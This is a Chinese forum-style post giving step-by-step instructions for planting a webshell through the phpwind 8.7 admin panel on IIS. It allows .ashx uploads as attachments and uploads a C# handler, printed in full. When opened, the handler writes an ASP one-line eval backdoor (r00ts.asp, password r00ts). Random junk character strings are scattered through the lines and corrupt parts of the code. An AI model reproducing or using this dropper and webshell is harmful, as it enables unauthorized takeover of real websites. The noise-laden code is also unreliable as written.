phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小

群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx

0 P- b% d. r2 U发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整

然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx

打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
4 H: G6 u2 Q4 p$ ~  @
下面是代码:

% F9 z" I1 J: L! R% ~6 T0 P<%@ WebHandler Language="C#"Class="Handler" %>
using System;
4 L; M) z2 Z6 G+ Nusing System.Web;
using System.IO;
public class Handler : IHttpHandler {
* M! P' h1 Z! p0 Mpublic void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
6 H& F  E, P# M8 _: X( [& `9 W* g) T) `StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
file1.Write("<%eval request(\"r00ts\")%>");
file1.Flush();
file1.Close();
}
5 s7 G2 X+ {: l/ vpublic bool IsReusable {
. Z: h3 s4 y9 w1 x, f- v$ [8 G; qget {
7 E- x/ T" {+ s. o' p; U) dreturn false;
}
( S5 [$ a  E% r$ P' ?4 V}
- C1 c+ t/ \" q. B0 z' O. w; V- J}
9 @2 q* l0 R$ R; z; L